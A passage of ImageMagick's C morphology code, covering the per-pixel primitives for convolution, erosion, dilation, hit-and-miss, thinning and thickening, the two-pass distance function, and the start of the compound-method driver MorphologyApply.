register ssize_t
u;
register const double
*restrict k;
register const PixelPacket
*restrict k_pixels;
register const IndexPacket
*restrict k_indexes;
MagickPixelPacket
result,
min,
max;
/* Copy input image to the output image for unused channels
       * This removes the need for 'cloning' a new image every iteration
*/
*q = p[r];
if (image->colorspace == CMYKColorspace)
q_indexes[x] = p_indexes[r];
/* Defaults */
min.red =
min.green =
min.blue =
min.opacity =
min.index = (MagickRealType) QuantumRange;
max.red =
max.green =
max.blue =
max.opacity =
max.index = (MagickRealType) 0;
/* default result is the original pixel value */
result.red = (MagickRealType) p[r].red;
result.green = (MagickRealType) p[r].green;
result.blue = (MagickRealType) p[r].blue;
result.opacity = QuantumRange - (MagickRealType) p[r].opacity;
result.index = 0.0;
if ( image->colorspace == CMYKColorspace)
result.index = (MagickRealType) p_indexes[r];
switch (method) {
case ConvolveMorphology:
/* Set the bias of the weighted average output */
result.red =
result.green =
result.blue =
result.opacity =
result.index = bias;
break;
case DilateIntensityMorphology:
case ErodeIntensityMorphology:
/* use a boolean flag indicating when first match found */
result.red = 0.0; /* result is not used otherwise */
break;
default:
break;
}
switch ( method ) {
case ConvolveMorphology:
/* Weighted Average of pixels using reflected kernel
**
          ** NOTE for correct working of this operation for asymmetrical
          ** kernels, the kernel needs to be applied in its reflected form.
          ** That is, its values need to be reversed.
          **
          ** Correlation is actually the same as this but without reflecting
          ** the kernel, and thus 'lower-level' than Convolution.  However,
          ** as Convolution is the more commonly used method, and a reflected
          ** kernel costs little extra processing, it is Convolution that is
          ** implemented.
**
** Correlation will have its kernel reflected before calling
** this function to do a Convolve.
**
** For more details of Correlation vs Convolution see
** http://www.cs.umd.edu/~djacobs/CMSC426/Convolution.pdf
*/
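          /* Worked example: a 1-D kernel [1,2,3] with origin at index 1,
          ** convolved at pixel p, computes 3*p[-1] + 2*p[0] + 1*p[+1];
          ** the weights are visited in reversed (reflected) order.
          */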
k = &kernel->values[ kernel->width*kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
if ( ((channel & SyncChannels) == 0 ) ||
(image->matte == MagickFalse) )
{ /* No 'Sync' involved.
** Convolution is simple greyscale channel operation
*/
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) ) continue;
result.red += (*k)*k_pixels[u].red;
result.green += (*k)*k_pixels[u].green;
result.blue += (*k)*k_pixels[u].blue;
result.opacity += (*k)*k_pixels[u].opacity;
if ( image->colorspace == CMYKColorspace)
result.index += (*k)*k_indexes[u];
}
k_pixels += virt_width;
k_indexes += virt_width;
}
if ((channel & RedChannel) != 0)
q->red = ClampToQuantum(result.red);
if ((channel & GreenChannel) != 0)
q->green = ClampToQuantum(result.green);
if ((channel & BlueChannel) != 0)
q->blue = ClampToQuantum(result.blue);
if ((channel & OpacityChannel) != 0
&& image->matte == MagickTrue )
q->opacity = ClampToQuantum(result.opacity);
if ((channel & IndexChannel) != 0
&& image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(result.index);
}
else
{ /* Channel 'Sync' Flag, and Alpha Channel enabled.
** Weight the color channels with Alpha Channel so that
** transparent pixels are not part of the results.
*/
MagickRealType
alpha, /* alpha weighting of colors : kernel*alpha */
gamma; /* divisor, sum of color weighting values */
gamma=0.0;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) ) continue;
alpha=(*k)*(QuantumScale*(QuantumRange-
k_pixels[u].opacity));
gamma += alpha;
result.red += alpha*k_pixels[u].red;
result.green += alpha*k_pixels[u].green;
result.blue += alpha*k_pixels[u].blue;
result.opacity += (*k)*k_pixels[u].opacity;
if ( image->colorspace == CMYKColorspace)
result.index += alpha*k_indexes[u];
}
k_pixels += virt_width;
k_indexes += virt_width;
}
/* Sync'ed channels, all channels are modified */
gamma=1.0/(fabs((double) gamma) <= MagickEpsilon ? 1.0 : gamma);
q->red = ClampToQuantum(gamma*result.red);
q->green = ClampToQuantum(gamma*result.green);
q->blue = ClampToQuantum(gamma*result.blue);
q->opacity = ClampToQuantum(result.opacity);
if (image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(gamma*result.index);
}
break;
case ErodeMorphology:
/* Minimum Value within kernel neighbourhood
**
** NOTE that the kernel is not reflected for this operation!
**
          ** NOTE: in normal Greyscale Morphology, the kernel value should
          ** be added to the real value; this is currently not done due to
          ** the nature of the boolean kernels being used.
*/
k = kernel->values;
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k++) {
if ( IsNan(*k) || (*k) < 0.5 ) continue;
Minimize(min.red, (double) k_pixels[u].red);
Minimize(min.green, (double) k_pixels[u].green);
Minimize(min.blue, (double) k_pixels[u].blue);
Minimize(min.opacity,
QuantumRange-(double) k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(min.index, (double) k_indexes[u]);
}
k_pixels += virt_width;
k_indexes += virt_width;
}
break;
case DilateMorphology:
/* Maximum Value within kernel neighbourhood
**
          ** NOTE for correct working of this operation for asymmetrical
          ** kernels, the kernel needs to be applied in its reflected form.
          ** That is, its values need to be reversed.
          **
          ** NOTE: in normal Greyscale Morphology, the kernel value should
          ** be added to the real value; this is currently not done due to
          ** the nature of the boolean kernels being used.
**
*/
k = &kernel->values[ kernel->width*kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) || (*k) < 0.5 ) continue;
Maximize(max.red, (double) k_pixels[u].red);
Maximize(max.green, (double) k_pixels[u].green);
Maximize(max.blue, (double) k_pixels[u].blue);
Maximize(max.opacity,
QuantumRange-(double) k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Maximize(max.index, (double) k_indexes[u]);
}
k_pixels += virt_width;
k_indexes += virt_width;
}
break;
case HitAndMissMorphology:
case ThinningMorphology:
case ThickenMorphology:
          /* Minimum of Foreground Pixel minus Maximum of Background Pixels
**
** NOTE that the kernel is not reflected for this operation,
** and consists of both foreground and background pixel
** neighbourhoods, 0.0 for background, and 1.0 for foreground
          ** with either NaN or 0.5 values for don't care.
**
** Note that this will never produce a meaningless negative
** result. Such results can cause Thinning/Thicken to not work
** correctly when used against a greyscale image.
*/
k = kernel->values;
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k++) {
if ( IsNan(*k) ) continue;
if ( (*k) > 0.7 )
                { /* minimum of foreground pixels */
Minimize(min.red, (double) k_pixels[u].red);
Minimize(min.green, (double) k_pixels[u].green);
Minimize(min.blue, (double) k_pixels[u].blue);
Minimize(min.opacity,
QuantumRange-(double) k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(min.index, (double) k_indexes[u]);
}
else if ( (*k) < 0.3 )
{ /* maximum of background pixels */
Maximize(max.red, (double) k_pixels[u].red);
Maximize(max.green, (double) k_pixels[u].green);
Maximize(max.blue, (double) k_pixels[u].blue);
Maximize(max.opacity,
QuantumRange-(double) k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Maximize(max.index, (double) k_indexes[u]);
}
}
k_pixels += virt_width;
k_indexes += virt_width;
}
/* Pattern Match if difference is positive */
min.red -= max.red; Maximize( min.red, 0.0 );
min.green -= max.green; Maximize( min.green, 0.0 );
min.blue -= max.blue; Maximize( min.blue, 0.0 );
min.opacity -= max.opacity; Maximize( min.opacity, 0.0 );
min.index -= max.index; Maximize( min.index, 0.0 );
break;
case ErodeIntensityMorphology:
/* Select Pixel with Minimum Intensity within kernel neighbourhood
**
** WARNING: the intensity test fails for CMYK and does not
** take into account the moderating effect of the alpha channel
** on the intensity.
**
** NOTE that the kernel is not reflected for this operation!
*/
k = kernel->values;
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k++) {
if ( IsNan(*k) || (*k) < 0.5 ) continue;
if ( result.red == 0.0 ||
PixelIntensity(&(k_pixels[u])) < PixelIntensity(q) ) {
/* copy the whole pixel - no channel selection */
*q = k_pixels[u];
if ( result.red > 0.0 ) changed++;
result.red = 1.0;
}
}
k_pixels += virt_width;
k_indexes += virt_width;
}
break;
case DilateIntensityMorphology:
/* Select Pixel with Maximum Intensity within kernel neighbourhood
**
** WARNING: the intensity test fails for CMYK and does not
** take into account the moderating effect of the alpha channel
** on the intensity (yet).
**
          ** NOTE for correct working of this operation for asymmetrical
          ** kernels, the kernel needs to be applied in its reflected form.
          ** That is, its values need to be reversed.
*/
k = &kernel->values[ kernel->width*kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) || (*k) < 0.5 ) continue; /* boolean kernel */
if ( result.red == 0.0 ||
PixelIntensity(&(k_pixels[u])) > PixelIntensity(q) ) {
/* copy the whole pixel - no channel selection */
*q = k_pixels[u];
if ( result.red > 0.0 ) changed++;
result.red = 1.0;
}
}
k_pixels += virt_width;
k_indexes += virt_width;
}
break;
#if 0
This code has been obsoleted by the MorphologyPrimitiveDirect() function.
However it is still (almost) correct coding for Grayscale Morphology.
That is...
        GrayErode is equivalent, but with kernel values subtracted from pixels
          without the kernel rotation
        GreyDilate is equivalent, but using Maximum() instead of Minimum()
          using kernel rotation
case DistanceMorphology:
/* Add kernel Value and select the minimum value found.
          ** The result is an iterative distance from the edge of the image
          ** shape.
          **
          ** All Distance Kernels are symmetrical, but that may not always
          ** be the case.  For example, how about a distance from left edges?
          ** To work correctly with asymmetrical kernels the reflected kernel
          ** needs to be applied.
*/
k = &kernel->values[ kernel->width*kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) ) continue;
Minimize(result.red, (*k)+k_pixels[u].red);
Minimize(result.green, (*k)+k_pixels[u].green);
Minimize(result.blue, (*k)+k_pixels[u].blue);
Minimize(result.opacity, (*k)+QuantumRange-k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(result.index, (*k)+k_indexes[u]);
}
k_pixels += virt_width;
k_indexes += virt_width;
}
break;
#endif
case UndefinedMorphology:
default:
break; /* Do nothing */
}
/* Final mathematics of results (combine with original image?)
**
      ** NOTE: Difference Morphology operators Edge* and *Hat could also
      ** be done here, but work better with iteration as an image difference
      ** in the controlling function (below).  Thicken and Thinning however
      ** should be done here so they can be iterated correctly.
*/
switch ( method ) {
case HitAndMissMorphology:
case ErodeMorphology:
result = min; /* minimum of neighbourhood */
break;
case DilateMorphology:
result = max; /* maximum of neighbourhood */
break;
case ThinningMorphology:
/* subtract pattern match from original */
result.red -= min.red;
result.green -= min.green;
result.blue -= min.blue;
result.opacity -= min.opacity;
result.index -= min.index;
break;
case ThickenMorphology:
          /* Add the pattern matches to the original */
result.red += min.red;
result.green += min.green;
result.blue += min.blue;
result.opacity += min.opacity;
result.index += min.index;
break;
default:
/* result directly calculated or assigned */
break;
}
/* Assign the resulting pixel values - Clamping Result */
switch ( method ) {
case UndefinedMorphology:
case ConvolveMorphology:
case DilateIntensityMorphology:
case ErodeIntensityMorphology:
break; /* full pixel was directly assigned - not a channel method */
default:
if ((channel & RedChannel) != 0)
q->red = ClampToQuantum(result.red);
if ((channel & GreenChannel) != 0)
q->green = ClampToQuantum(result.green);
if ((channel & BlueChannel) != 0)
q->blue = ClampToQuantum(result.blue);
if ((channel & OpacityChannel) != 0
&& image->matte == MagickTrue )
q->opacity = ClampToQuantum(QuantumRange-result.opacity);
if ((channel & IndexChannel) != 0
&& image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(result.index);
break;
}
/* Count up changed pixels */
if ( ( p[r].red != q->red )
|| ( p[r].green != q->green )
|| ( p[r].blue != q->blue )
|| ( p[r].opacity != q->opacity )
|| ( image->colorspace == CMYKColorspace &&
p_indexes[r] != q_indexes[x] ) )
changed++; /* The pixel was changed in some way! */
p++;
q++;
} /* x */
if ( SyncCacheViewAuthenticPixels(q_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_MorphologyImage)
#endif
proceed=SetImageProgress(image,MorphologyTag,progress++,image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
} /* y */
q_view=DestroyCacheView(q_view);
p_view=DestroyCacheView(p_view);
return(status ? (ssize_t)changed : -1);
}
/* This is almost identical to the MorphologyPrimitive() function above,
** but will apply the primitive directly to the image in two passes.
**
** That is, after each row is 'Sync'ed into the image, the next row will
** make use of those values as part of the calculation of the next row.
** It then repeats, but going in the opposite (bottom-up) direction.
**
** Because of this 'iterative' handling this function can not make use
** of multi-threaded, parallel processing.
*/
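/* A minimal standalone sketch (not compiled) of the same two-pass idea on a
** 1-D array: the forward pass propagates distance from the left using
** already-updated values, the backward pass from the right.  Illustrative
** only; the function below performs the 2-D version using kernel halves.
*/
#if 0
static void distance_1d(double *v, const size_t n)
{
  size_t
    i;

  for (i=1; i < n; i++)       /* forward: use just-updated left neighbour */
    if (v[i] > v[i-1]+1.0)
      v[i]=v[i-1]+1.0;
  for (i=n-1; i > 0; i--)     /* backward: use just-updated right neighbour */
    if (v[i-1] > v[i]+1.0)
      v[i-1]=v[i]+1.0;
}
#endif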
static ssize_t MorphologyPrimitiveDirect(const Image *image,
const MorphologyMethod method, const ChannelType channel,
const KernelInfo *kernel,ExceptionInfo *exception)
{
CacheView
*auth_view,
*virt_view;
MagickBooleanType
status;
MagickOffsetType
progress;
ssize_t
y, offx, offy;
size_t
virt_width,
changed;
status=MagickTrue;
changed=0;
progress=0;
assert(image != (Image *) NULL);
assert(image->signature == MagickSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickSignature);
  /* Some methods (including convolve) need to use a reflected kernel.
   * Adjust 'origin' offsets to loop through the kernel as a reflection.
*/
offx = kernel->x;
offy = kernel->y;
switch(method) {
case DistanceMorphology:
      /* kernel needs to be used with reflection about origin */
offx = (ssize_t) kernel->width-offx-1;
offy = (ssize_t) kernel->height-offy-1;
break;
#if 0
case ?????Morphology:
/* kernel is used as is, without reflection */
break;
#endif
default:
      assert(0 && "Not a PrimitiveDirect Morphology Method");
break;
}
/* DO NOT THREAD THIS CODE! */
/* two views into same image (virtual, and actual) */
virt_view=AcquireCacheView(image);
auth_view=AcquireCacheView(image);
virt_width=image->columns+kernel->width-1;
for (y=0; y < (ssize_t) image->rows; y++)
{
register const PixelPacket
*restrict p;
register const IndexPacket
*restrict p_indexes;
register PixelPacket
*restrict q;
register IndexPacket
*restrict q_indexes;
register ssize_t
x;
ssize_t
r;
    /* NOTE: read virtual pixels, and authentic pixels, from the same image!
    ** We read using virtual to get virtual pixel handling, but write back
    ** into the same image.
    **
    ** Only the top half of the kernel is processed, as we do a single pass
    ** downward through the image, iterating the distance function as we go.
*/
if (status == MagickFalse)
break;
p=GetCacheViewVirtualPixels(virt_view, -offx, y-offy, virt_width, offy+1,
exception);
q=GetCacheViewAuthenticPixels(auth_view, 0, y, image->columns, 1,
exception);
if ((p == (const PixelPacket *) NULL) || (q == (PixelPacket *) NULL))
status=MagickFalse;
if (status == MagickFalse)
break;
p_indexes=GetCacheViewVirtualIndexQueue(virt_view);
q_indexes=GetCacheViewAuthenticIndexQueue(auth_view);
    /* offset to origin in 'p', while 'q' points to it directly */
r = virt_width*offy + offx;
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
v;
register ssize_t
u;
register const double
*restrict k;
register const PixelPacket
*restrict k_pixels;
register const IndexPacket
*restrict k_indexes;
MagickPixelPacket
result;
/* Defaults */
result.red = (MagickRealType) q->red;
result.green = (MagickRealType) q->green;
result.blue = (MagickRealType) q->blue;
result.opacity = QuantumRange - (MagickRealType) q->opacity;
result.index = 0.0;
if ( image->colorspace == CMYKColorspace)
result.index = (MagickRealType) *q_indexes;
switch ( method ) {
case DistanceMorphology:
/* Add kernel Value and select the minimum value found. */
k = &kernel->values[ kernel->width*kernel->height-1 ];
k_pixels = p;
k_indexes = p_indexes;
for (v=0; v <= (ssize_t) offy; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) ) continue;
Minimize(result.red, (*k)+k_pixels[u].red);
Minimize(result.green, (*k)+k_pixels[u].green);
Minimize(result.blue, (*k)+k_pixels[u].blue);
Minimize(result.opacity, (*k)+QuantumRange-k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(result.index, (*k)+k_indexes[u]);
}
k_pixels += virt_width;
k_indexes += virt_width;
}
/* repeat with the just processed pixels of this row */
k = &kernel->values[ kernel->width*(kernel->y+1)-1 ];
k_pixels = q-offx;
k_indexes = q_indexes-offx;
for (u=0; u < (ssize_t) offx; u++, k--) {
if ( x+u-offx < 0 ) continue; /* off the edge! */
if ( IsNan(*k) ) continue;
Minimize(result.red, (*k)+k_pixels[u].red);
Minimize(result.green, (*k)+k_pixels[u].green);
Minimize(result.blue, (*k)+k_pixels[u].blue);
Minimize(result.opacity, (*k)+QuantumRange-k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(result.index, (*k)+k_indexes[u]);
}
break;
default:
/* result directly calculated or assigned */
break;
}
/* Assign the resulting pixel values - Clamping Result */
if ((channel & RedChannel) != 0)
q->red = ClampToQuantum(result.red);
if ((channel & GreenChannel) != 0)
q->green = ClampToQuantum(result.green);
if ((channel & BlueChannel) != 0)
q->blue = ClampToQuantum(result.blue);
if ((channel & OpacityChannel) != 0
&& image->matte == MagickTrue )
q->opacity = ClampToQuantum(QuantumRange-result.opacity);
if ((channel & IndexChannel) != 0
&& image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(result.index);
/* Count up changed pixels */
if ( ( p[r].red != q->red )
|| ( p[r].green != q->green )
|| ( p[r].blue != q->blue )
|| ( p[r].opacity != q->opacity )
|| ( image->colorspace == CMYKColorspace &&
p_indexes[r] != q_indexes[x] ) )
changed++; /* The pixel was changed in some way! */
p++; /* increment pixel buffers */
q++;
} /* x */
if ( SyncCacheViewAuthenticPixels(auth_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
if ( SetImageProgress(image,MorphologyTag,progress++,image->rows)
== MagickFalse )
status=MagickFalse;
} /* y */
/* Do the reversed pass through the image */
for (y=(ssize_t)image->rows-1; y >= 0; y--)
{
register const PixelPacket
*restrict p;
register const IndexPacket
*restrict p_indexes;
register PixelPacket
*restrict q;
register IndexPacket
*restrict q_indexes;
register ssize_t
x;
ssize_t
r;
if (status == MagickFalse)
break;
    /* NOTE: read virtual pixels, and authentic pixels, from the same image!
    ** We read using virtual to get virtual pixel handling, but write back
    ** into the same image.
    **
    ** Only the bottom half of the kernel will be processed, as we move
    ** up the image.
*/
p=GetCacheViewVirtualPixels(virt_view, -offx, y, virt_width, kernel->y+1,
exception);
q=GetCacheViewAuthenticPixels(auth_view, 0, y, image->columns, 1,
exception);
if ((p == (const PixelPacket *) NULL) || (q == (PixelPacket *) NULL))
status=MagickFalse;
if (status == MagickFalse)
break;
p_indexes=GetCacheViewVirtualIndexQueue(virt_view);
q_indexes=GetCacheViewAuthenticIndexQueue(auth_view);
/* adjust positions to end of row */
p += image->columns-1;
q += image->columns-1;
    /* offset to origin in 'p', while 'q' points to it directly */
r = offx;
for (x=(ssize_t)image->columns-1; x >= 0; x--)
{
ssize_t
v;
register ssize_t
u;
register const double
*restrict k;
register const PixelPacket
*restrict k_pixels;
register const IndexPacket
*restrict k_indexes;
MagickPixelPacket
result;
/* Defaults */
result.red = (MagickRealType) q->red;
result.green = (MagickRealType) q->green;
result.blue = (MagickRealType) q->blue;
result.opacity = QuantumRange - (MagickRealType) q->opacity;
result.index = 0.0;
if ( image->colorspace == CMYKColorspace)
result.index = (MagickRealType) *q_indexes;
switch ( method ) {
case DistanceMorphology:
/* Add kernel Value and select the minimum value found. */
k = &kernel->values[ kernel->width*(kernel->y+1)-1 ];
k_pixels = p;
k_indexes = p_indexes;
for (v=offy; v < (ssize_t) kernel->height; v++) {
for (u=0; u < (ssize_t) kernel->width; u++, k--) {
if ( IsNan(*k) ) continue;
Minimize(result.red, (*k)+k_pixels[u].red);
Minimize(result.green, (*k)+k_pixels[u].green);
Minimize(result.blue, (*k)+k_pixels[u].blue);
Minimize(result.opacity, (*k)+QuantumRange-k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(result.index, (*k)+k_indexes[u]);
}
k_pixels += virt_width;
k_indexes += virt_width;
}
/* repeat with the just processed pixels of this row */
k = &kernel->values[ kernel->width*(kernel->y)+kernel->x-1 ];
k_pixels = q-offx;
k_indexes = q_indexes-offx;
for (u=offx+1; u < (ssize_t) kernel->width; u++, k--) {
if ( (size_t)(x+u-offx) >= image->columns ) continue;
if ( IsNan(*k) ) continue;
Minimize(result.red, (*k)+k_pixels[u].red);
Minimize(result.green, (*k)+k_pixels[u].green);
Minimize(result.blue, (*k)+k_pixels[u].blue);
Minimize(result.opacity, (*k)+QuantumRange-k_pixels[u].opacity);
if ( image->colorspace == CMYKColorspace)
Minimize(result.index, (*k)+k_indexes[u]);
}
break;
default:
/* result directly calculated or assigned */
break;
}
/* Assign the resulting pixel values - Clamping Result */
if ((channel & RedChannel) != 0)
q->red = ClampToQuantum(result.red);
if ((channel & GreenChannel) != 0)
q->green = ClampToQuantum(result.green);
if ((channel & BlueChannel) != 0)
q->blue = ClampToQuantum(result.blue);
if ((channel & OpacityChannel) != 0
&& image->matte == MagickTrue )
q->opacity = ClampToQuantum(QuantumRange-result.opacity);
if ((channel & IndexChannel) != 0
&& image->colorspace == CMYKColorspace)
q_indexes[x] = ClampToQuantum(result.index);
/* Count up changed pixels */
if ( ( p[r].red != q->red )
|| ( p[r].green != q->green )
|| ( p[r].blue != q->blue )
|| ( p[r].opacity != q->opacity )
|| ( image->colorspace == CMYKColorspace &&
p_indexes[r] != q_indexes[x] ) )
changed++; /* The pixel was changed in some way! */
p--; /* go backward through pixel buffers */
q--;
} /* x */
if ( SyncCacheViewAuthenticPixels(auth_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
if ( SetImageProgress(image,MorphologyTag,progress++,image->rows)
== MagickFalse )
status=MagickFalse;
} /* y */
auth_view=DestroyCacheView(auth_view);
virt_view=DestroyCacheView(virt_view);
return(status ? (ssize_t)changed : -1);
}
/* Apply a Morphology by calling the above low-level primitive application
** functions.  This function handles any iteration loops, composition or
** re-iteration of results, and compound morphology methods that are based
** on multiple low-level (staged) morphology methods.
**
** Basically this provides the complex glue between the requested morphology
** method and the raw low-level implementation (above).
*/
MagickExport Image *MorphologyApply(const Image *image, const ChannelType
channel,const MorphologyMethod method, const ssize_t iterations,
const KernelInfo *kernel, const CompositeOperator compose,
const double bias, ExceptionInfo *exception)
{
CompositeOperator
curr_compose;
Image
*curr_image, /* Image we are working with or iterating */
*work_image, /* secondary image for primitive iteration */
*save_image, /* saved image - for 'edge' method only */
*rslt_image; /* resultant image - after multi-kernel handling */
KernelInfo
*reflected_kernel, /* A reflected copy of the kernel (if needed) */
*norm_kernel, /* the current normal un-reflected kernel */
*rflt_kernel, /* the current reflected kernel (if needed) */
*this_kernel; /* the kernel being applied */
MorphologyMethod
primitive; /* the current morphology primitive being applied */
CompositeOperator
rslt_compose; /* multi-kernel compose method for results to use */
MagickBooleanType
verbose; /* verbose output of results */
size_t
method_loop, /* Loop 1: number of compound method iterations (norm 1) */
method_limit, /* maximum number of compound method iterations */
kernel_number, /* Loop 2: the kernel number being applied */
stage_loop, /* Loop 3: primitive loop for compound morphology */
stage_limit, /* how many primitives are in this compound */
kernel_loop, /* Loop 4: iterate the kernel over image */
kernel_limit, /* number of times to iterate kernel */
count, /* total count of primitive steps applied */
kernel_changed, /* total count of changed using iterated kernel */
method_changed; /* total count of changed over method iteration */
ssize_t
changed; /* number pixels changed by last primitive operation */
char
    v_info[MaxTextExtent];
assert(image != (Image *) NULL);
assert(image->signature == MagickSignature);
assert(kernel != (KernelInfo *) NULL);
assert(kernel->signature == MagickSignature);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickSignature);
count = 0; /* number of low-level morphology primitives performed */
if ( iterations == 0 )
return((Image *)NULL); /* null operation - nothing to do! */
kernel_limit = (size_t) iterations;
  if ( iterations < 0 )  /* negative iterations = infinite (well, almost) */
kernel_limit = image->columns > image->rows ? image->columns : image->rows;
verbose = IsMagickTrue(GetImageArtifact(image,"verbose"));
/* initialise for cleanup */
curr_image = (Image *) image;
curr_compose = image->compose;
work_image = save_image = rslt_image = (Image *) NULL;
reflected_kernel = (KernelInfo *) NULL;
/* Initialize specific methods
   * + which loop should use the given iterations
* + how many primitives make up the compound morphology
* + multi-kernel compose method to use (by default)
*/
method_limit = 1; /* just do method once, unless otherwise set */
stage_limit = 1; /* assume method is not a compound */
rslt_compose = compose; /* and we are composing multi-kernels as given */
switch( method ) {
case SmoothMorphology: /* 4 primitive compound morphology */
stage_limit = 4;
break;
case OpenMorphology: /* 2 primitive compound morphology */
case OpenIntensityMorphology:
case TopHatMorphology:
case CloseMorphology:
case CloseIntensityMorphology:
case BottomHatMorphology:
case EdgeMorphology:
stage_limit = 2;
break;
case HitAndMissMorphology:
rslt_compose = LightenCompositeOp; /* Union of multi-kernel results */
      /* FALL THRU */
case ThinningMorphology:
case ThickenMorphology:
method_limit = kernel_limit; /* iterate the whole method */
kernel_limit = 1; /* do not do kernel iteration */
break;
case DistanceMorphology:
      kernel_limit = 1; /* Cannot iterate a direct-modify method in the main loop - yet */
break;
default:
break;
}
/* Handle user (caller) specified multi-kernel composition method */
if ( compose != UndefinedCompositeOp )
rslt_compose = compose; /* override default composition for method */
if ( rslt_compose == UndefinedCompositeOp )
rslt_compose = NoCompositeOp; /* still not defined! Then re-iterate */
/* Some methods require a reflected kernel to use with primitives.
* Create the reflected kernel for those methods. */
switch ( method ) {
case CorrelateMorphology:
case CloseMorphology:
case CloseIntensityMorphology:
case BottomHatMorphology:
case SmoothMorphology:
reflected_kernel = CloneKernelInfo(kernel);
if (reflected_kernel == (KernelInfo *) NULL)
goto error_cleanup;
RotateKernelInfo(reflected_kernel,180);
break;
default:
break;
}
/* Loop 1: iterate the compound method */
method_loop = 0;
method_changed = 1;
while ( method_loop < method_limit && method_changed > 0 ) {
method_loop++;
method_changed = 0;
/* Loop 2: iterate over each kernel in a multi-kernel list */
norm_kernel = (KernelInfo *) kernel;
this_kernel = (KernelInfo *) kernel;
rflt_kernel = reflected_kernel;
kernel_number = 0;
while ( norm_kernel != NULL ) {
      /* Loop 3: Compound Morphology Staging - Select Primitive to apply */
stage_loop = 0; /* the compound morphology stage number */
while ( stage_loop < stage_limit ) {
stage_loop++; /* The stage of the compound morphology */
/* Select primitive morphology for this stage of compound method */
this_kernel = norm_kernel; /* default use unreflected kernel */
primitive = method; /* Assume method is a primitive */
switch( method ) {
case ErodeMorphology: /* just erode */
case EdgeInMorphology: /* erode and image difference */
primitive = ErodeMorphology;
break;
case DilateMorphology: /* just dilate */
case EdgeOutMorphology: /* dilate and image difference */
primitive = DilateMorphology;
break;
          case OpenMorphology:      /* erode then dilate */
case TopHatMorphology: /* open and image difference */
primitive = ErodeMorphology;
if ( stage_loop == 2 )
primitive = DilateMorphology;
break;
case OpenIntensityMorphology:
primitive = ErodeIntensityMorphology;
if ( stage_loop == 2 )
primitive = DilateIntensityMorphology;
break;
case CloseMorphology: /* dilate, then erode */
case BottomHatMorphology: /* close and image difference */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateMorphology;
if ( stage_loop == 2 )
primitive = ErodeMorphology;
break;
case CloseIntensityMorphology:
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateIntensityMorphology;
if ( stage_loop == 2 )
primitive = ErodeIntensityMorphology;
break;
case SmoothMorphology: /* open, close */
switch ( stage_loop ) {
case 1: /* start an open method, which starts with Erode */
primitive = ErodeMorphology;
break;
case 2: /* now Dilate the Erode */
primitive = DilateMorphology;
break;
              case 3:  /* Reflect kernel for a close */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateMorphology;
break;
case 4: /* Finish the Close */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = ErodeMorphology;
break;
}
break;
case EdgeMorphology: /* dilate and erode difference */
primitive = DilateMorphology;
if ( stage_loop == 2 ) {
save_image = curr_image; /* save the image difference */
curr_image = (Image *) image;
primitive = ErodeMorphology;
}
break;
case CorrelateMorphology:
/* A Correlation is a Convolution with a reflected kernel.
** However a Convolution is a weighted sum using a reflected
            ** kernel.  It may seem strange to convert a Correlation into a
            ** Convolution as the Correlation is the simpler method, but
** Convolution is much more commonly used, and it makes sense to
** implement it directly so as to avoid the need to duplicate the
** kernel when it is not required (which is typically the
** default).
*/
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = ConvolveMorphology;
break;
default:
break;
}
assert( this_kernel != (KernelInfo *) NULL );
/* Extra information for debugging compound operations */
if ( verbose == MagickTrue ) {
if ( stage_limit > 1 )
(void) FormatMagickString(v_info,MaxTextExtent,"%s:%.20g.%.20g -> ",
